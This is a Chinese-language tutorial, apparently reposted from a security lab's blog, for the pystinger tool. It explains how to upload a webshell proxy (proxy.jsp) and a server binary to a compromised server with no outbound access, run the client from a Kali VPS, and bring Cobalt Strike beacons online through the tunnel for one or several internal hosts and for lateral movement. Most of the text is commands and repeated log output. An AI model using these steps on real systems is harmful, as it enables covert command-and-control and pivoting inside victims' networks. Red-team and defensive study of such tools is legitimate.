文章来源： Khan安全攻防实验室

pystinger通过webshell实现内网SOCK4代理,端口映射，可直接用于metasploit-framework,viper,cobalt strike上线。

        主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本。

    假设不出网服务器域名为 http://example.com:8080 ,服务器内网IP地址为192.168.3.11

1 . SOCK4代理

proxy.jsp上传到目标服务器,确保 http://example.com:8080/proxy.jsp 可以访问,页面返回UTF-8

将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行start D:/XXX/stinger_server.exe启动服务端

不要直接运行D:/XXX/stinger_server.exe,会导致tcp断连

vps执行./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000

如下输出表示成功

root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 600002020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...2020-01-06 21:12:47,674 - INFO - 622 - Local listencheckpass2020-01-0621:12:47,674- INFO -623- Socks4aon127.0.0.1:600002020-01-0621:12:47,674- INFO -628- WEBSHELL checking ...2020-01-0621:12:47,681- INFO -631- WEBSHELLcheckpass2020-01-0621:12:47,681- INFO -632-http://example.com:8080/proxy.jsp2020-01-0621:12:47,682- INFO -637- REMOTE_SERVER checking ...2020-01-0621:12:47,696- INFO -644- REMOTE_SERVERcheckpass2020-01-0621:12:47,696- INFO -645---- Sever Config ---2020-01-0621:12:47,696- INFO -647- client_address_list => []2020-01-0621:12:47,696- INFO -647- SERVER_LISTEN =>127.0.0.1:600102020-01-0621:12:47,696- INFO -647- LOG_LEVEL => INFO2020-01-0621:12:47,697- INFO -647- MIRROR_LISTEN =>127.0.0.1:600202020-01-0621:12:47,697- INFO -647- mirror_address_list => []2020-01-0621:12:47,697- INFO -647- READ_BUFF_SIZE =>512002020-01-0621:12:47,697- INFO -673- TARGET_ADDRESS :127.0.0.1:600202020-01-0621:12:47,697- INFO -677- SLEEP_TIME :0.012020-01-0621:12:47,697- INFO -679---- RAT Config ---2020-01-0621:12:47,697- INFO -681-Handler/LISTEN should listenon127.0.0.1:600202020-01-0621:12:47,697- INFO -683- Payload shouldconnectto127.0.0.1:600202020-01-0621:12:47,698-WARNING-111- LoopThreadstart2020-01-0621:12:47,703-WARNING-502- socks4aserverstarton127.0.0.1:600002020-01-0621:12:47,703-WARNING-509- Socks4a readytoaccept

此时已经在vps127.0.0.1:60000启动了一个example.com所在内网的socks4a代理

此时已经将目标服务器的127.0.0.1:60020映射到vps的127.0.0.1:60020

2 . cobalt strike单主机上线

proxy.jsp上传到目标服务器,确保 http://example.com:8080/proxy.jsp 可以访问,页面返回UTF-8

将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行start D:/XXX/stinger_server.exe启动服务端

不要直接运行D:/XXX/stinger_server.exe,会导致tcp断连

stinger_client命令行执行./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000

如下输出表示成功

root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 600002020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...2020-01-06 21:12:47,674 - INFO - 622 - Local listencheckpass2020-01-0621:12:47,674- INFO -623- Socks4aon127.0.0.1:600002020-01-0621:12:47,674- INFO -628- WEBSHELL checking ...2020-01-0621:12:47,681- INFO -631- WEBSHELLcheckpass2020-01-0621:12:47,681- INFO -632-http://example.com:8080/proxy.jsp2020-01-0621:12:47,682- INFO -637- REMOTE_SERVER checking ...2020-01-0621:12:47,696- INFO -644- REMOTE_SERVERcheckpass2020-01-0621:12:47,696- INFO -645---- Sever Config ---2020-01-0621:12:47,696- INFO -647- client_address_list => []2020-01-0621:12:47,696- INFO -647- SERVER_LISTEN =>127.0.0.1:600102020-01-0621:12:47,696- INFO -647- LOG_LEVEL => INFO2020-01-0621:12:47,697- INFO -647- MIRROR_LISTEN =>127.0.0.1:600202020-01-0621:12:47,697- INFO -647- mirror_address_list => []2020-01-0621:12:47,697- INFO -647- READ_BUFF_SIZE =>512002020-01-0621:12:47,697- INFO -673- TARGET_ADDRESS :127.0.0.1:600202020-01-0621:12:47,697- INFO -677- SLEEP_TIME :0.012020-01-0621:12:47,697- INFO -679---- RAT Config ---2020-01-0621:12:47,697- INFO -681-Handler/LISTEN should listenon127.0.0.1:600202020-01-0621:12:47,697- INFO -683- Payload shouldconnectto127.0.0.1:600202020-01-0621:12:47,698-WARNING-111- LoopThreadstart2020-01-0621:12:47,703-WARNING-502- socks4aserverstarton127.0.0.1:600002020-01-0621:12:47,703-WARNING-509- Socks4a readytoaccept

cobalt strike添加监听,端口选择输出信息RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为127.0.0.1

生成payload,上传到主机运行后即可上线

3 . cobalt strike多主机上线

proxy.jsp上传到目标服务器,确保 http://example.com:8080/proxy.jsp 可以访问,页面返回UTF-8

将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行start D:/XXX/stinger_server.exe 192.168.3.11启动服务端

192.168.3.11可以改成0.0.0.0

stinger_client命令行执行./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000

如下输出表示成功

root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 600002020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...2020-01-06 21:12:47,674 - INFO - 622 - Local listencheckpass2020-01-0621:12:47,674- INFO -623- Socks4aon127.0.0.1:600002020-01-0621:12:47,674- INFO -628- WEBSHELL checking ...2020-01-0621:12:47,681- INFO -631- WEBSHELLcheckpass2020-01-0621:12:47,681- INFO -632-http://example.com:8080/proxy.jsp2020-01-0621:12:47,682- INFO -637- REMOTE_SERVER checking ...2020-01-0621:12:47,696- INFO -644- REMOTE_SERVERcheckpass2020-01-0621:12:47,696- INFO -645---- Sever Config ---2020-01-0621:12:47,696- INFO -647- client_address_list => []2020-01-0621:12:47,696- INFO -647- SERVER_LISTEN =>127.0.0.1:600102020-01-0621:12:47,696- INFO -647- LOG_LEVEL => INFO2020-01-0621:12:47,697- INFO -647- MIRROR_LISTEN =>192.168.3.11:600202020-01-0621:12:47,697- INFO -647- mirror_address_list => []2020-01-0621:12:47,697- INFO -647- READ_BUFF_SIZE =>512002020-01-0621:12:47,697- INFO -673- TARGET_ADDRESS :127.0.0.1:600202020-01-0621:12:47,697- INFO -677- SLEEP_TIME :0.012020-01-0621:12:47,697- INFO -679---- RAT Config ---2020-01-0621:12:47,697- INFO -681-Handler/LISTEN should listenon127.0.0.1:600202020-01-0621:12:47,697- INFO -683- Payload shouldconnectto192.168.3.11:600202020-01-0621:12:47,698-WARNING-111- LoopThreadstart2020-01-0621:12:47,703-WARNING-502- socks4aserverstarton127.0.0.1:600002020-01-0621:12:47,703-WARNING-509- Socks4a readytoaccept

cobalt strike添加监听,端口选择RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为192.168.3.11(example.com的内网IP地址)

生成payload,上传到主机运行后即可上线

横向移动到其他主机时可以将payload指向192.168.3.11:60020即可实现出网上线

4 . 定制Header及proxy

如果webshell需要配置Cookie或者Authorization,可通过--header参数配置请求头

--header "Authorization: XXXXXX,Cookie: XXXXX"

如果webshell需要通过代理访问,可通过--proxy设置代理

--proxy "socks5:127.0.0.1:1081"

stinger_server\stinger_client

windows

linux

proxy.jsp(x)/php/aspx

php7.2

tomcat7.0

iis8.0

项目地址：

https://github.com/FunnyWolf/pystinger/releases/tag/v1.6